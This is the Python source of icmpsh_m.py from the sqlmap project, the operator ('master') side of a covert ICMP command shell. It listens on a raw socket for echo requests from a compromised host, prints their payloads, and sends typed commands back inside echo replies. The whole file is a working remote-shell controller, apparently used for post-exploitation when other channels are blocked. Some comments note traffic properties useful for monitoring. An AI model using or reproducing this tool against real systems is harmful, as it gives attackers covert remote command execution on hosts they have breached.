GitHub Repository: sqlmapproject/sqlmap
Path: blob/master/extra/icmpsh/icmpsh_m.py
#!/usr/bin/env python
#
# icmpsh - simple icmp command shell (port of icmpsh-m.pl written in
# Perl by Nico Leidecker <[email protected]>)
#
# Copyright (c) 2010, Bernardo Damele A. G. <[email protected]>
#
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import select
import socket
import sys
def setNonBlocking(fd):
    """
    Switch the given file descriptor to non-blocking mode

    The descriptor's current status flags are read with F_GETFL and written
    back with O_NONBLOCK added, so flags that were already set are kept.
    """

    # Imported here rather than at module level, as in the original listing
    import fcntl

    current = fcntl.fcntl(fd, fcntl.F_GETFL)
    fcntl.fcntl(fd, fcntl.F_SETFL, current | os.O_NONBLOCK)
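def main(src, dst):
    """
    Run the icmpsh master loop between two IPv4 addresses

    Waits for ICMP echo requests (type 8) sent from `dst` to `src`, writes
    their payload to standard output and answers each one with an echo
    reply that reuses the request's identifier and sequence number and
    carries the line read from standard input (empty when nothing was
    typed). The line "exit" ends the session.

    Properties of the channel worth knowing when reviewing or monitoring it:
    - payloads travel unencrypted and unauthenticated; a packet is accepted
      purely on its IP source/destination pair and ICMP type
    - received payload is written to the terminal as-is, so it is
      untrusted output
    - on the wire it appears as echo request/reply pairs whose payloads
      carry arbitrary, variable-length data

    src -- local IPv4 address; must equal the destination of incoming
           requests and is used as the source of the replies
    dst -- remote IPv4 address; must equal the source of incoming requests
           and is where replies are sent
    """

    # os.name is "nt" on Windows, whereas sys.platform is "win32" there, so
    # a comparison of sys.platform against "nt" can never match.
    if os.name == "nt":
        sys.stderr.write('icmpsh master can only run on Posix systems\n')
        sys.exit(255)

    try:
        from impacket import ImpactDecoder
        from impacket import ImpactPacket
    except ImportError:
        sys.stderr.write('You need to install Python Impacket library first\n')
        sys.exit(255)

    import fcntl

    # Make standard input a non-blocking file, remembering its flags so the
    # invoking terminal is not left in non-blocking mode afterwards
    stdin_fd = sys.stdin.fileno()
    saved_flags = fcntl.fcntl(stdin_fd, fcntl.F_GETFL)
    setNonBlocking(stdin_fd)

    sock = None

    try:
        # Open one socket for ICMP protocol
        # A special option is set on the socket so that IP headers are included
        # with the returned data
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
        except socket.error:
            sys.stderr.write('You need to run icmpsh master with administrator privileges\n')
            sys.exit(1)

        sock.setblocking(0)
        sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)

        # Create a new IP packet and set its source and destination addresses
        ip = ImpactPacket.IP()
        ip.set_ip_src(src)
        ip.set_ip_dst(dst)

        # Create a new ICMP packet of type ECHO REPLY
        icmp = ImpactPacket.ICMP()
        icmp.set_icmp_type(icmp.ICMP_ECHOREPLY)

        # Instantiate an IP packets decoder
        decoder = ImpactDecoder.IPDecoder()

        while True:
            try:
                cmd = ''

                # Wait for incoming packets on the raw socket
                if sock not in select.select([sock], [], [])[0]:
                    continue

                buff = sock.recv(4096)

                if 0 == len(buff):
                    # Socket remotely closed; the finally clause closes it
                    return

                # Packet received; decode it
                ippacket = decoder.decode(buff)
                icmppacket = ippacket.child()

                # Only echo requests travelling from dst to src belong to the
                # session; every other ICMP packet seen by the socket is skipped
                if not (ippacket.get_ip_dst() == src and ippacket.get_ip_src() == dst and 8 == icmppacket.get_icmp_type()):
                    continue

                # Get identifier and sequence number
                ident = icmppacket.get_icmp_id()
                seq_id = icmppacket.get_icmp_seq()
                data = icmppacket.get_data_as_string()

                # Payload comes from the network and is shown unfiltered
                if len(data) > 0:
                    sys.stdout.write(data)

                # Parse command from standard input; a non-blocking read with
                # nothing typed may fail, in which case cmd stays empty.
                # Catching Exception (not everything) lets Ctrl-C reach the
                # outer handler.
                try:
                    cmd = sys.stdin.readline()
                except Exception:
                    pass

                if cmd == 'exit\n':
                    return

                # Set sequence number and identifier
                icmp.set_icmp_id(ident)
                icmp.set_icmp_seq(seq_id)

                # Include the command as data inside the ICMP packet
                icmp.contains(ImpactPacket.Data(cmd))

                # Calculate its checksum
                icmp.set_icmp_cksum(0)
                icmp.auto_checksum = 1

                # Have the IP packet contain the ICMP packet (along with its payload)
                ip.contains(icmp)

                try:
                    # Send it to the target host
                    sock.sendto(ip.get_packet(), (dst, 0))
                except socket.error as ex:
                    sys.stderr.write("'%s'\n" % ex)
                    sys.stderr.flush()
            except KeyboardInterrupt:
                break
            except Exception as ex:
                # Still ends the loop, but reports why instead of exiting silently
                sys.stderr.write("'%s'\n" % ex)
                sys.stderr.flush()
                break
    finally:
        # Release the raw socket and give standard input its original flags
        # back on every exit path
        if sock is not None:
            sock.close()
        fcntl.fcntl(stdin_fd, fcntl.F_SETFL, saved_flags)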
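if __name__ == '__main__':
    # Both addresses are mandatory: the local (source) address first, then
    # the remote (destination) address
    if len(sys.argv) < 3:
        # Print the script name as it was invoked; the hard-coded
        # './icmpsh-m.py' did not match this file's name (icmpsh_m.py)
        msg = 'missing mandatory options. Execute as root:\n'
        msg += '%s <source IP address> <destination IP address>\n' % sys.argv[0]
        sys.stderr.write(msg)
        sys.exit(1)

    main(sys.argv[1], sys.argv[2])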